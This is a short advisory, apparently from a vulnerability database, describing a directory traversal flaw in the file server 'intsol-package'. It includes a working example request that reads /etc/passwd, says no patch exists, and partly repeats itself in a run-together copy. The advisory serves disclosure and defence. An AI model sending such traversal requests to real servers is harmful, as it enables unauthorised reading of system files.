intsol-package
is a file server.
intsol-package
is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.
Example Request:
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:localhost
and the server's Response
HTTP/1.1 200 OK
Date: Thu, 04 May 2017 23:59:18 GMT
Connection: keep-alive
Transfer-Encoding: chunked
{contents of /etc/passwd}
Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
References
intsol-package
is a file server.intsol-package
is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url.Example Request:
and the server's Response
Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
References